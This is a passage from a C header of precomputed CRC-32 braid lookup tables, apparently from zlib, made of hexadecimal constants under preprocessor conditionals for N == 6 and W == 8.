0x3ae0095e, 0x7cdb6e3b, 0xb696c794, 0xf0ada0f1, 0x630be410, 0x25308375, 0xef7d2ada, 0xa9464dbf, 0x8836d2c3, 0xce0db5a6, 0x04401c09, 0x427b7b6c, 0xd1dd3f8d, 0x97e658e8, 0x5dabf147, 0x1b909622, 0x1f4bcfbe, 0x5970a8db, 0x933d0174, 0xd5066611, 0x46a022f0, 0x009b4595, 0xcad6ec3a, 0x8ced8b5f, 0xad9d1423, 0xeba67346, 0x21ebdae9, 0x67d0bd8c, 0xf476f96d, 0xb24d9e08, 0x780037a7, 0x3e3b50c2, 0x31b0f544, 0x778b9221, 0xbdc63b8e, 0xfbfd5ceb, 0x685b180a, 0x2e607f6f, 0xe42dd6c0, 0xa216b1a5, 0x83662ed9, 0xc55d49bc, 0x0f10e013, 0x492b8776, 0xda8dc397, 0x9cb6a4f2, 0x56fb0d5d, 0x10c06a38, 0x141b33a4, 0x522054c1, 0x986dfd6e, 0xde569a0b, 0x4df0deea, 0x0bcbb98f, 0xc1861020, 0x87bd7745, 0xa6cde839, 0xe0f68f5c, 0x2abb26f3, 0x6c804196, 0xff260577, 0xb91d6212, 0x7350cbbd, 0x356bacd8}}; #endif #endif #if N == 6 #if W == 8 local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0x3db1ecdc, 0x7b63d9b8, 0x46d23564, 0xf6c7b370, 0xcb765fac, 0x8da46ac8, 0xb0158614, 0x36fe60a1, 0x0b4f8c7d, 0x4d9db919, 0x702c55c5, 0xc039d3d1, 0xfd883f0d, 0xbb5a0a69, 0x86ebe6b5, 0x6dfcc142, 0x504d2d9e, 0x169f18fa, 0x2b2ef426, 0x9b3b7232, 0xa68a9eee, 0xe058ab8a, 0xdde94756, 0x5b02a1e3, 0x66b34d3f, 0x2061785b, 0x1dd09487, 0xadc51293, 0x9074fe4f, 0xd6a6cb2b, 0xeb1727f7, 0xdbf98284, 0xe6486e58, 0xa09a5b3c, 0x9d2bb7e0, 0x2d3e31f4, 0x108fdd28, 0x565de84c, 0x6bec0490, 0xed07e225, 0xd0b60ef9, 0x96643b9d, 0xabd5d741, 0x1bc05155, 
0x2671bd89, 0x60a388ed, 0x5d126431, 0xb60543c6, 0x8bb4af1a, 0xcd669a7e, 0xf0d776a2, 0x40c2f0b6, 0x7d731c6a, 0x3ba1290e, 0x0610c5d2, 0x80fb2367, 0xbd4acfbb, 0xfb98fadf, 0xc6291603, 0x763c9017, 0x4b8d7ccb, 0x0d5f49af, 0x30eea573, 0x6c820349, 0x5133ef95, 0x17e1daf1, 0x2a50362d, 0x9a45b039, 0xa7f45ce5, 0xe1266981, 0xdc97855d, 0x5a7c63e8, 0x67cd8f34, 0x211fba50, 0x1cae568c, 0xacbbd098, 0x910a3c44, 0xd7d80920, 0xea69e5fc, 0x017ec20b, 0x3ccf2ed7, 0x7a1d1bb3, 0x47acf76f, 0xf7b9717b, 0xca089da7, 0x8cdaa8c3, 0xb16b441f, 0x3780a2aa, 0x0a314e76, 0x4ce37b12, 0x715297ce, 0xc14711da, 0xfcf6fd06, 0xba24c862, 0x879524be, 0xb77b81cd, 0x8aca6d11, 0xcc185875, 0xf1a9b4a9, 0x41bc32bd, 0x7c0dde61, 0x3adfeb05, 0x076e07d9, 0x8185e16c, 0xbc340db0, 0xfae638d4, 0xc757d408, 0x7742521c, 0x4af3bec0, 0x0c218ba4, 0x31906778, 0xda87408f, 0xe736ac53, 0xa1e49937, 0x9c5575eb, 0x2c40f3ff, 0x11f11f23, 0x57232a47, 0x6a92c69b, 0xec79202e, 0xd1c8ccf2, 0x971af996, 0xaaab154a, 0x1abe935e, 0x270f7f82, 0x61dd4ae6, 0x5c6ca63a, 0xd9040692, 0xe4b5ea4e, 0xa267df2a, 0x9fd633f6, 0x2fc3b5e2, 0x1272593e, 0x54a06c5a, 0x69118086, 0xeffa6633, 0xd24b8aef, 0x9499bf8b, 0xa9285357, 0x193dd543, 0x248c399f, 0x625e0cfb, 0x5fefe027, 0xb4f8c7d0, 0x89492b0c, 0xcf9b1e68, 0xf22af2b4, 0x423f74a0, 0x7f8e987c, 0x395cad18, 0x04ed41c4, 0x8206a771, 0xbfb74bad, 0xf9657ec9, 0xc4d49215, 0x74c11401, 0x4970f8dd, 0x0fa2cdb9, 0x32132165, 0x02fd8416, 0x3f4c68ca, 0x799e5dae, 0x442fb172, 0xf43a3766, 0xc98bdbba, 0x8f59eede, 0xb2e80202, 0x3403e4b7, 0x09b2086b, 0x4f603d0f, 0x72d1d1d3, 0xc2c457c7, 0xff75bb1b, 0xb9a78e7f, 0x841662a3, 0x6f014554, 0x52b0a988, 0x14629cec, 0x29d37030, 0x99c6f624, 0xa4771af8, 0xe2a52f9c, 0xdf14c340, 0x59ff25f5, 0x644ec929, 0x229cfc4d, 0x1f2d1091, 0xaf389685, 0x92897a59, 0xd45b4f3d, 0xe9eaa3e1, 0xb58605db, 0x8837e907, 0xcee5dc63, 0xf35430bf, 0x4341b6ab, 0x7ef05a77, 0x38226f13, 0x059383cf, 0x8378657a, 0xbec989a6, 0xf81bbcc2, 0xc5aa501e, 0x75bfd60a, 0x480e3ad6, 0x0edc0fb2, 0x336de36e, 0xd87ac499, 0xe5cb2845, 0xa3191d21, 
0x9ea8f1fd, 0x2ebd77e9, 0x130c9b35, 0x55deae51, 0x686f428d, 0xee84a438, 0xd33548e4, 0x95e77d80, 0xa856915c, 0x18431748, 0x25f2fb94, 0x6320cef0, 0x5e91222c, 0x6e7f875f, 0x53ce6b83, 0x151c5ee7, 0x28adb23b, 0x98b8342f, 0xa509d8f3, 0xe3dbed97, 0xde6a014b, 0x5881e7fe, 0x65300b22, 0x23e23e46, 0x1e53d29a, 0xae46548e, 0x93f7b852, 0xd5258d36, 0xe89461ea, 0x0383461d, 0x3e32aac1, 0x78e09fa5, 0x45517379, 0xf544f56d, 0xc8f519b1, 0x8e272cd5, 0xb396c009, 0x357d26bc, 0x08ccca60, 0x4e1eff04, 0x73af13d8, 0xc3ba95cc, 0xfe0b7910, 0xb8d94c74, 0x8568a0a8}, {0x00000000, 0x69790b65, 0xd2f216ca, 0xbb8b1daf, 0x7e952bd5, 0x17ec20b0, 0xac673d1f, 0xc51e367a, 0xfd2a57aa, 0x94535ccf, 0x2fd84160, 0x46a14a05, 0x83bf7c7f, 0xeac6771a, 0x514d6ab5, 0x383461d0, 0x2125a915, 0x485ca270, 0xf3d7bfdf, 0x9aaeb4ba, 0x5fb082c0, 0x36c989a5, 0x8d42940a, 0xe43b9f6f, 0xdc0ffebf, 0xb576f5da, 0x0efde875, 0x6784e310, 0xa29ad56a, 0xcbe3de0f, 0x7068c3a0, 0x1911c8c5, 0x424b522a, 0x2b32594f, 0x90b944e0, 0xf9c04f85, 0x3cde79ff, 0x55a7729a, 0xee2c6f35, 0x87556450, 0xbf610580, 0xd6180ee5, 0x6d93134a, 0x04ea182f, 0xc1f42e55, 0xa88d2530, 0x1306389f, 0x7a7f33fa, 0x636efb3f, 0x0a17f05a, 0xb19cedf5, 0xd8e5e690, 0x1dfbd0ea, 0x7482db8f, 0xcf09c620, 0xa670cd45, 0x9e44ac95, 0xf73da7f0, 0x4cb6ba5f, 0x25cfb13a, 0xe0d18740, 0x89a88c25, 0x3223918a, 0x5b5a9aef, 0x8496a454, 0xedefaf31, 0x5664b29e, 0x3f1db9fb, 0xfa038f81, 0x937a84e4, 0x28f1994b, 0x4188922e, 0x79bcf3fe, 0x10c5f89b, 0xab4ee534, 0xc237ee51, 0x0729d82b, 0x6e50d34e, 0xd5dbcee1, 0xbca2c584, 0xa5b30d41, 0xccca0624, 0x77411b8b, 0x1e3810ee, 0xdb262694, 0xb25f2df1, 0x09d4305e, 0x60ad3b3b, 0x58995aeb, 0x31e0518e, 0x8a6b4c21, 0xe3124744, 0x260c713e, 0x4f757a5b, 0xf4fe67f4, 0x9d876c91, 0xc6ddf67e, 0xafa4fd1b, 0x142fe0b4, 0x7d56ebd1, 0xb848ddab, 0xd131d6ce, 0x6abacb61, 0x03c3c004, 0x3bf7a1d4, 0x528eaab1, 0xe905b71e, 0x807cbc7b, 0x45628a01, 0x2c1b8164, 0x97909ccb, 0xfee997ae, 0xe7f85f6b, 0x8e81540e, 0x350a49a1, 0x5c7342c4, 0x996d74be, 0xf0147fdb, 0x4b9f6274, 0x22e66911, 0x1ad208c1, 
0x73ab03a4, 0xc8201e0b, 0xa159156e, 0x64472314, 0x0d3e2871, 0xb6b535de, 0xdfcc3ebb, 0xd25c4ee9, 0xbb25458c, 0x00ae5823, 0x69d75346, 0xacc9653c, 0xc5b06e59, 0x7e3b73f6, 0x17427893, 0x2f761943, 0x460f1226, 0xfd840f89, 0x94fd04ec, 0x51e33296, 0x389a39f3, 0x8311245c, 0xea682f39, 0xf379e7fc, 0x9a00ec99, 0x218bf136, 0x48f2fa53, 0x8deccc29, 0xe495c74c, 0x5f1edae3, 0x3667d186, 0x0e53b056, 0x672abb33, 0xdca1a69c, 0xb5d8adf9, 0x70c69b83, 0x19bf90e6, 0xa2348d49, 0xcb4d862c, 0x90171cc3, 0xf96e17a6, 0x42e50a09, 0x2b9c016c, 0xee823716, 0x87fb3c73, 0x3c7021dc, 0x55092ab9, 0x6d3d4b69, 0x0444400c, 0xbfcf5da3, 0xd6b656c6, 0x13a860bc, 0x7ad16bd9, 0xc15a7676, 0xa8237d13, 0xb132b5d6, 0xd84bbeb3, 0x63c0a31c, 0x0ab9a879, 0xcfa79e03, 0xa6de9566, 0x1d5588c9, 0x742c83ac, 0x4c18e27c, 0x2561e919, 0x9eeaf4b6, 0xf793ffd3, 0x328dc9a9, 0x5bf4c2cc, 0xe07fdf63, 0x8906d406, 0x56caeabd, 0x3fb3e1d8, 0x8438fc77, 0xed41f712, 0x285fc168, 0x4126ca0d, 0xfaadd7a2, 0x93d4dcc7, 0xabe0bd17, 0xc299b672, 0x7912abdd, 0x106ba0b8, 0xd57596c2, 0xbc0c9da7, 0x07878008, 0x6efe8b6d, 0x77ef43a8, 0x1e9648cd, 0xa51d5562, 0xcc645e07, 0x097a687d, 0x60036318, 0xdb887eb7, 0xb2f175d2, 0x8ac51402, 0xe3bc1f67, 0x583702c8, 0x314e09ad, 0xf4503fd7, 0x9d2934b2, 0x26a2291d, 0x4fdb2278, 0x1481b897, 0x7df8b3f2, 0xc673ae5d, 0xaf0aa538, 0x6a149342, 0x036d9827, 0xb8e68588, 0xd19f8eed, 0xe9abef3d, 0x80d2e458, 0x3b59f9f7, 0x5220f292, 0x973ec4e8, 0xfe47cf8d, 0x45ccd222, 0x2cb5d947, 0x35a41182, 0x5cdd1ae7, 0xe7560748, 0x8e2f0c2d, 0x4b313a57, 0x22483132, 0x99c32c9d, 0xf0ba27f8, 0xc88e4628, 0xa1f74d4d, 0x1a7c50e2, 0x73055b87, 0xb61b6dfd, 0xdf626698, 0x64e97b37, 0x0d907052}, {0x00000000, 0x7fc99b93, 0xff933726, 0x805aacb5, 0x2457680d, 0x5b9ef39e, 0xdbc45f2b, 0xa40dc4b8, 0x48aed01a, 0x37674b89, 0xb73de73c, 0xc8f47caf, 0x6cf9b817, 0x13302384, 0x936a8f31, 0xeca314a2, 0x915da034, 0xee943ba7, 0x6ece9712, 0x11070c81, 0xb50ac839, 0xcac353aa, 0x4a99ff1f, 0x3550648c, 0xd9f3702e, 0xa63aebbd, 0x26604708, 0x59a9dc9b, 0xfda41823, 0x826d83b0, 0x02372f05, 
0x7dfeb496, 0xf9ca4629, 0x8603ddba, 0x0659710f, 0x7990ea9c, 0xdd9d2e24, 0xa254b5b7, 0x220e1902, 0x5dc78291, 0xb1649633, 0xcead0da0, 0x4ef7a115, 0x313e3a86, 0x9533fe3e, 0xeafa65ad, 0x6aa0c918, 0x1569528b, 0x6897e61d, 0x175e7d8e, 0x9704d13b, 0xe8cd4aa8, 0x4cc08e10, 0x33091583, 0xb353b936, 0xcc9a22a5, 0x20393607, 0x5ff0ad94, 0xdfaa0121, 0xa0639ab2, 0x046e5e0a, 0x7ba7c599, 0xfbfd692c, 0x8434f2bf, 0x28e58a13, 0x572c1180, 0xd776bd35, 0xa8bf26a6, 0x0cb2e21e, 0x737b798d, 0xf321d538, 0x8ce84eab, 0x604b5a09, 0x1f82c19a, 0x9fd86d2f, 0xe011f6bc, 0x441c3204, 0x3bd5a997, 0xbb8f0522, 0xc4469eb1, 0xb9b82a27, 0xc671b1b4, 0x462b1d01, 0x39e28692, 0x9def422a, 0xe226d9b9, 0x627c750c, 0x1db5ee9f, 0xf116fa3d, 0x8edf61ae, 0x0e85cd1b, 0x714c5688, 0xd5419230, 0xaa8809a3, 0x2ad2a516, 0x551b3e85, 0xd12fcc3a, 0xaee657a9, 0x2ebcfb1c, 0x5175608f, 0xf578a437, 0x8ab13fa4, 0x0aeb9311, 0x75220882, 0x99811c20, 0xe64887b3, 0x66122b06, 0x19dbb095, 0xbdd6742d, 0xc21fefbe, 0x4245430b, 0x3d8cd898, 0x40726c0e, 0x3fbbf79d, 0xbfe15b28, 0xc028c0bb, 0x64250403, 0x1bec9f90, 0x9bb63325, 0xe47fa8b6, 0x08dcbc14, 0x77152787, 0xf74f8b32, 0x888610a1, 0x2c8bd419, 0x53424f8a, 0xd318e33f, 0xacd178ac, 0x51cb1426, 0x2e028fb5, 0xae582300, 0xd191b893, 0x759c7c2b, 0x0a55e7b8, 0x8a0f4b0d, 0xf5c6d09e, 0x1965c43c, 0x66ac5faf, 0xe6f6f31a, 0x993f6889, 0x3d32ac31, 0x42fb37a2, 0xc2a19b17, 0xbd680084, 0xc096b412, 0xbf5f2f81, 0x3f058334, 0x40cc18a7, 0xe4c1dc1f, 0x9b08478c, 0x1b52eb39, 0x649b70aa, 0x88386408, 0xf7f1ff9b, 0x77ab532e, 0x0862c8bd, 0xac6f0c05, 0xd3a69796, 0x53fc3b23, 0x2c35a0b0, 0xa801520f, 0xd7c8c99c, 0x57926529, 0x285bfeba, 0x8c563a02, 0xf39fa191, 0x73c50d24, 0x0c0c96b7, 0xe0af8215, 0x9f661986, 0x1f3cb533, 0x60f52ea0, 0xc4f8ea18, 0xbb31718b, 0x3b6bdd3e, 0x44a246ad, 0x395cf23b, 0x469569a8, 0xc6cfc51d, 0xb9065e8e, 0x1d0b9a36, 0x62c201a5, 0xe298ad10, 0x9d513683, 0x71f22221, 0x0e3bb9b2, 0x8e611507, 0xf1a88e94, 0x55a54a2c, 0x2a6cd1bf, 0xaa367d0a, 0xd5ffe699, 0x792e9e35, 0x06e705a6, 0x86bda913, 0xf9743280, 0x5d79f638, 
0x22b06dab, 0xa2eac11e, 0xdd235a8d, 0x31804e2f, 0x4e49d5bc, 0xce137909, 0xb1dae29a, 0x15d72622, 0x6a1ebdb1, 0xea441104, 0x958d8a97, 0xe8733e01, 0x97baa592, 0x17e00927, 0x682992b4, 0xcc24560c, 0xb3edcd9f, 0x33b7612a, 0x4c7efab9, 0xa0ddee1b, 0xdf147588, 0x5f4ed93d, 0x208742ae, 0x848a8616, 0xfb431d85, 0x7b19b130, 0x04d02aa3, 0x80e4d81c, 0xff2d438f, 0x7f77ef3a, 0x00be74a9, 0xa4b3b011, 0xdb7a2b82, 0x5b208737, 0x24e91ca4, 0xc84a0806, 0xb7839395, 0x37d93f20, 0x4810a4b3, 0xec1d600b, 0x93d4fb98, 0x138e572d, 0x6c47ccbe, 0x11b97828, 0x6e70e3bb, 0xee2a4f0e, 0x91e3d49d, 0x35ee1025, 0x4a278bb6, 0xca7d2703, 0xb5b4bc90, 0x5917a832, 0x26de33a1, 0xa6849f14, 0xd94d0487, 0x7d40c03f, 0x02895bac, 0x82d3f719, 0xfd1a6c8a}, {0x00000000, 0xa396284c, 0x9c5d56d9, 0x3fcb7e95, 0xe3cbabf3, 0x405d83bf, 0x7f96fd2a, 0xdc00d566, 0x1ce651a7, 0xbf7079eb, 0x80bb077e, 0x232d2f32, 0xff2dfa54, 0x5cbbd218, 0x6370ac8d, 0xc0e684c1, 0x39cca34e, 0x9a5a8b02, 0xa591f597, 0x0607dddb, 0xda0708bd, 0x799120f1, 0x465a5e64, 0xe5cc7628, 0x252af2e9, 0x86bcdaa5, 0xb977a430, 0x1ae18c7c, 0xc6e1591a, 0x65777156, 0x5abc0fc3, 0xf92a278f, 0x7399469c, 0xd00f6ed0, 0xefc41045, 0x4c523809, 0x9052ed6f, 0x33c4c523, 0x0c0fbbb6, 0xaf9993fa, 0x6f7f173b, 0xcce93f77, 0xf32241e2, 0x50b469ae, 0x8cb4bcc8, 0x2f229484, 0x10e9ea11, 0xb37fc25d, 0x4a55e5d2, 0xe9c3cd9e, 0xd608b30b, 0x759e9b47, 0xa99e4e21, 0x0a08666d, 0x35c318f8, 0x965530b4, 0x56b3b475, 0xf5259c39, 0xcaeee2ac, 0x6978cae0, 0xb5781f86, 0x16ee37ca, 0x2925495f, 0x8ab36113, 0xe7328d38, 0x44a4a574, 0x7b6fdbe1, 0xd8f9f3ad, 0x04f926cb, 0xa76f0e87, 0x98a47012, 0x3b32585e, 0xfbd4dc9f, 0x5842f4d3, 0x67898a46, 0xc41fa20a, 0x181f776c, 0xbb895f20, 0x844221b5, 0x27d409f9, 0xdefe2e76, 0x7d68063a, 0x42a378af, 0xe13550e3, 0x3d358585, 0x9ea3adc9, 0xa168d35c, 0x02fefb10, 0xc2187fd1, 0x618e579d, 0x5e452908, 0xfdd30144, 0x21d3d422, 0x8245fc6e, 0xbd8e82fb, 0x1e18aab7, 0x94abcba4, 0x373de3e8, 0x08f69d7d, 0xab60b531, 0x77606057, 0xd4f6481b, 0xeb3d368e, 0x48ab1ec2, 0x884d9a03, 0x2bdbb24f, 0x1410ccda, 
0xb786e496, 0x6b8631f0, 0xc81019bc, 0xf7db6729, 0x544d4f65, 0xad6768ea, 0x0ef140a6, 0x313a3e33, 0x92ac167f, 0x4eacc319, 0xed3aeb55, 0xd2f195c0, 0x7167bd8c, 0xb181394d, 0x12171101, 0x2ddc6f94, 0x8e4a47d8, 0x524a92be, 0xf1dcbaf2, 0xce17c467, 0x6d81ec2b, 0x15141c31, 0xb682347d, 0x89494ae8, 0x2adf62a4, 0xf6dfb7c2, 0x55499f8e, 0x6a82e11b, 0xc914c957, 0x09f24d96, 0xaa6465da, 0x95af1b4f, 0x36393303, 0xea39e665, 0x49afce29, 0x7664b0bc, 0xd5f298f0, 0x2cd8bf7f, 0x8f4e9733, 0xb085e9a6, 0x1313c1ea, 0xcf13148c, 0x6c853cc0, 0x534e4255, 0xf0d86a19, 0x303eeed8, 0x93a8c694, 0xac63b801, 0x0ff5904d, 0xd3f5452b, 0x70636d67, 0x4fa813f2, 0xec3e3bbe, 0x668d5aad, 0xc51b72e1, 0xfad00c74, 0x59462438, 0x8546f15e, 0x26d0d912, 0x191ba787, 0xba8d8fcb, 0x7a6b0b0a, 0xd9fd2346, 0xe6365dd3, 0x45a0759f, 0x99a0a0f9, 0x3a3688b5, 0x05fdf620, 0xa66bde6c, 0x5f41f9e3, 0xfcd7d1af, 0xc31caf3a, 0x608a8776, 0xbc8a5210, 0x1f1c7a5c, 0x20d704c9, 0x83412c85, 0x43a7a844, 0xe0318008, 0xdffafe9d, 0x7c6cd6d1, 0xa06c03b7, 0x03fa2bfb, 0x3c31556e, 0x9fa77d22, 0xf2269109, 0x51b0b945, 0x6e7bc7d0, 0xcdedef9c, 0x11ed3afa, 0xb27b12b6, 0x8db06c23, 0x2e26446f, 0xeec0c0ae, 0x4d56e8e2, 0x729d9677, 0xd10bbe3b, 0x0d0b6b5d, 0xae9d4311, 0x91563d84, 0x32c015c8, 0xcbea3247, 0x687c1a0b, 0x57b7649e, 0xf4214cd2, 0x282199b4, 0x8bb7b1f8, 0xb47ccf6d, 0x17eae721, 0xd70c63e0, 0x749a4bac, 0x4b513539, 0xe8c71d75, 0x34c7c813, 0x9751e05f, 0xa89a9eca, 0x0b0cb686, 0x81bfd795, 0x2229ffd9, 0x1de2814c, 0xbe74a900, 0x62747c66, 0xc1e2542a, 0xfe292abf, 0x5dbf02f3, 0x9d598632, 0x3ecfae7e, 0x0104d0eb, 0xa292f8a7, 0x7e922dc1, 0xdd04058d, 0xe2cf7b18, 0x41595354, 0xb87374db, 0x1be55c97, 0x242e2202, 0x87b80a4e, 0x5bb8df28, 0xf82ef764, 0xc7e589f1, 0x6473a1bd, 0xa495257c, 0x07030d30, 0x38c873a5, 0x9b5e5be9, 0x475e8e8f, 0xe4c8a6c3, 0xdb03d856, 0x7895f01a}, {0x00000000, 0x2a283862, 0x545070c4, 0x7e7848a6, 0xa8a0e188, 0x8288d9ea, 0xfcf0914c, 0xd6d8a92e, 0x8a30c551, 0xa018fd33, 0xde60b595, 0xf4488df7, 0x229024d9, 0x08b81cbb, 0x76c0541d, 0x5ce86c7f, 0xcf108ce3, 
0xe538b481, 0x9b40fc27, 0xb168c445, 0x67b06d6b, 0x4d985509, 0x33e01daf, 0x19c825cd, 0x452049b2, 0x6f0871d0, 0x11703976, 0x3b580114, 0xed80a83a, 0xc7a89058, 0xb9d0d8fe, 0x93f8e09c, 0x45501f87, 0x6f7827e5, 0x11006f43, 0x3b285721, 0xedf0fe0f, 0xc7d8c66d, 0xb9a08ecb, 0x9388b6a9, 0xcf60dad6, 0xe548e2b4, 0x9b30aa12, 0xb1189270, 0x67c03b5e, 0x4de8033c, 0x33904b9a, 0x19b873f8, 0x8a409364, 0xa068ab06, 0xde10e3a0, 0xf438dbc2, 0x22e072ec, 0x08c84a8e, 0x76b00228, 0x5c983a4a, 0x00705635, 0x2a586e57, 0x542026f1, 0x7e081e93, 0xa8d0b7bd, 0x82f88fdf, 0xfc80c779, 0xd6a8ff1b, 0x8aa03f0e, 0xa088076c, 0xdef04fca, 0xf4d877a8, 0x2200de86, 0x0828e6e4, 0x7650ae42, 0x5c789620, 0x0090fa5f, 0x2ab8c23d, 0x54c08a9b, 0x7ee8b2f9, 0xa8301bd7, 0x821823b5, 0xfc606b13, 0xd6485371, 0x45b0b3ed, 0x6f988b8f, 0x11e0c329, 0x3bc8fb4b, 0xed105265, 0xc7386a07, 0xb94022a1, 0x93681ac3, 0xcf8076bc, 0xe5a84ede, 0x9bd00678, 0xb1f83e1a, 0x67209734, 0x4d08af56, 0x3370e7f0, 0x1958df92, 0xcff02089, 0xe5d818eb, 0x9ba0504d, 0xb188682f, 0x6750c101, 0x4d78f963, 0x3300b1c5, 0x192889a7, 0x45c0e5d8, 0x6fe8ddba, 0x1190951c, 0x3bb8ad7e, 0xed600450, 0xc7483c32, 0xb9307494, 0x93184cf6, 0x00e0ac6a, 0x2ac89408, 0x54b0dcae, 0x7e98e4cc, 0xa8404de2, 0x82687580, 0xfc103d26, 0xd6380544, 0x8ad0693b, 0xa0f85159, 0xde8019ff, 0xf4a8219d, 0x227088b3, 0x0858b0d1, 0x7620f877, 0x5c08c015, 0xce31785d, 0xe419403f, 0x9a610899, 0xb04930fb, 0x669199d5, 0x4cb9a1b7, 0x32c1e911, 0x18e9d173, 0x4401bd0c, 0x6e29856e, 0x1051cdc8, 0x3a79f5aa, 0xeca15c84, 0xc68964e6, 0xb8f12c40, 0x92d91422, 0x0121f4be, 0x2b09ccdc, 0x5571847a, 0x7f59bc18, 0xa9811536, 0x83a92d54, 0xfdd165f2, 0xd7f95d90, 0x8b1131ef, 0xa139098d, 0xdf41412b, 0xf5697949, 0x23b1d067, 0x0999e805, 0x77e1a0a3, 0x5dc998c1, 0x8b6167da, 0xa1495fb8, 0xdf31171e, 0xf5192f7c, 0x23c18652, 0x09e9be30, 0x7791f696, 0x5db9cef4, 0x0151a28b, 0x2b799ae9, 0x5501d24f, 0x7f29ea2d, 0xa9f14303, 0x83d97b61, 0xfda133c7, 0xd7890ba5, 0x4471eb39, 0x6e59d35b, 0x10219bfd, 0x3a09a39f, 0xecd10ab1, 0xc6f932d3, 0xb8817a75, 
0x92a94217, 0xce412e68, 0xe469160a, 0x9a115eac, 0xb03966ce, 0x66e1cfe0, 0x4cc9f782, 0x32b1bf24, 0x18998746, 0x44914753, 0x6eb97f31, 0x10c13797, 0x3ae90ff5, 0xec31a6db, 0xc6199eb9, 0xb861d61f, 0x9249ee7d, 0xcea18202, 0xe489ba60, 0x9af1f2c6, 0xb0d9caa4, 0x6601638a, 0x4c295be8, 0x3251134e, 0x18792b2c, 0x8b81cbb0, 0xa1a9f3d2, 0xdfd1bb74, 0xf5f98316, 0x23212a38, 0x0909125a, 0x77715afc, 0x5d59629e, 0x01b10ee1, 0x2b993683, 0x55e17e25, 0x7fc94647, 0xa911ef69, 0x8339d70b, 0xfd419fad, 0xd769a7cf, 0x01c158d4, 0x2be960b6, 0x55912810, 0x7fb91072, 0xa961b95c, 0x8349813e, 0xfd31c998, 0xd719f1fa, 0x8bf19d85, 0xa1d9a5e7, 0xdfa1ed41, 0xf589d523, 0x23517c0d, 0x0979446f, 0x77010cc9, 0x5d2934ab, 0xced1d437, 0xe4f9ec55, 0x9a81a4f3, 0xb0a99c91, 0x667135bf, 0x4c590ddd, 0x3221457b, 0x18097d19, 0x44e11166, 0x6ec92904, 0x10b161a2, 0x3a9959c0, 0xec41f0ee, 0xc669c88c, 0xb811802a, 0x9239b848}, {0x00000000, 0x4713f6fb, 0x8e27edf6, 0xc9341b0d, 0xc73eddad, 0x802d2b56, 0x4919305b, 0x0e0ac6a0, 0x550cbd1b, 0x121f4be0, 0xdb2b50ed, 0x9c38a616, 0x923260b6, 0xd521964d, 0x1c158d40, 0x5b067bbb, 0xaa197a36, 0xed0a8ccd, 0x243e97c0, 0x632d613b, 0x6d27a79b, 0x2a345160, 0xe3004a6d, 0xa413bc96, 0xff15c72d, 0xb80631d6, 0x71322adb, 0x3621dc20, 0x382b1a80, 0x7f38ec7b, 0xb60cf776, 0xf11f018d, 0x8f43f22d, 0xc85004d6, 0x01641fdb, 0x4677e920, 0x487d2f80, 0x0f6ed97b, 0xc65ac276, 0x8149348d, 0xda4f4f36, 0x9d5cb9cd, 0x5468a2c0, 0x137b543b, 0x1d71929b, 0x5a626460, 0x93567f6d, 0xd4458996, 0x255a881b, 0x62497ee0, 0xab7d65ed, 0xec6e9316, 0xe26455b6, 0xa577a34d, 0x6c43b840, 0x2b504ebb, 0x70563500, 0x3745c3fb, 0xfe71d8f6, 0xb9622e0d, 0xb768e8ad, 0xf07b1e56, 0x394f055b, 0x7e5cf3a0, 0xc5f6e21b, 0x82e514e0, 0x4bd10fed, 0x0cc2f916, 0x02c83fb6, 0x45dbc94d, 0x8cefd240, 0xcbfc24bb, 0x90fa5f00, 0xd7e9a9fb, 0x1eddb2f6, 0x59ce440d, 0x57c482ad, 0x10d77456, 0xd9e36f5b, 0x9ef099a0, 0x6fef982d, 0x28fc6ed6, 0xe1c875db, 0xa6db8320, 0xa8d14580, 0xefc2b37b, 0x26f6a876, 0x61e55e8d, 0x3ae32536, 0x7df0d3cd, 0xb4c4c8c0, 0xf3d73e3b, 0xfdddf89b, 
0xbace0e60, 0x73fa156d, 0x34e9e396, 0x4ab51036, 0x0da6e6cd, 0xc492fdc0, 0x83810b3b, 0x8d8bcd9b, 0xca983b60, 0x03ac206d, 0x44bfd696, 0x1fb9ad2d, 0x58aa5bd6, 0x919e40db, 0xd68db620, 0xd8877080, 0x9f94867b, 0x56a09d76, 0x11b36b8d, 0xe0ac6a00, 0xa7bf9cfb, 0x6e8b87f6, 0x2998710d, 0x2792b7ad, 0x60814156, 0xa9b55a5b, 0xeea6aca0, 0xb5a0d71b, 0xf2b321e0, 0x3b873aed, 0x7c94cc16, 0x729e0ab6, 0x358dfc4d, 0xfcb9e740, 0xbbaa11bb, 0x509cc277, 0x178f348c, 0xdebb2f81, 0x99a8d97a, 0x97a21fda, 0xd0b1e921, 0x1985f22c, 0x5e9604d7, 0x05907f6c, 0x42838997, 0x8bb7929a, 0xcca46461, 0xc2aea2c1, 0x85bd543a, 0x4c894f37, 0x0b9ab9cc, 0xfa85b841, 0xbd964eba, 0x74a255b7, 0x33b1a34c, 0x3dbb65ec, 0x7aa89317, 0xb39c881a, 0xf48f7ee1, 0xaf89055a, 0xe89af3a1, 0x21aee8ac, 0x66bd1e57, 0x68b7d8f7, 0x2fa42e0c, 0xe6903501, 0xa183c3fa, 0xdfdf305a, 0x98ccc6a1, 0x51f8ddac, 0x16eb2b57, 0x18e1edf7, 0x5ff21b0c, 0x96c60001, 0xd1d5f6fa, 0x8ad38d41, 0xcdc07bba, 0x04f460b7, 0x43e7964c, 0x4ded50ec, 0x0afea617, 0xc3cabd1a, 0x84d94be1, 0x75c64a6c, 0x32d5bc97, 0xfbe1a79a, 0xbcf25161, 0xb2f897c1, 0xf5eb613a, 0x3cdf7a37, 0x7bcc8ccc, 0x20caf777, 0x67d9018c, 0xaeed1a81, 0xe9feec7a, 0xe7f42ada, 0xa0e7dc21, 0x69d3c72c, 0x2ec031d7, 0x956a206c, 0xd279d697, 0x1b4dcd9a, 0x5c5e3b61, 0x5254fdc1, 0x15470b3a, 0xdc731037, 0x9b60e6cc, 0xc0669d77, 0x87756b8c, 0x4e417081, 0x0952867a, 0x075840da, 0x404bb621, 0x897fad2c, 0xce6c5bd7, 0x3f735a5a, 0x7860aca1, 0xb154b7ac, 0xf6474157, 0xf84d87f7, 0xbf5e710c, 0x766a6a01, 0x31799cfa, 0x6a7fe741, 0x2d6c11ba, 0xe4580ab7, 0xa34bfc4c, 0xad413aec, 0xea52cc17, 0x2366d71a, 0x647521e1, 0x1a29d241, 0x5d3a24ba, 0x940e3fb7, 0xd31dc94c, 0xdd170fec, 0x9a04f917, 0x5330e21a, 0x142314e1, 0x4f256f5a, 0x083699a1, 0xc10282ac, 0x86117457, 0x881bb2f7, 0xcf08440c, 0x063c5f01, 0x412fa9fa, 0xb030a877, 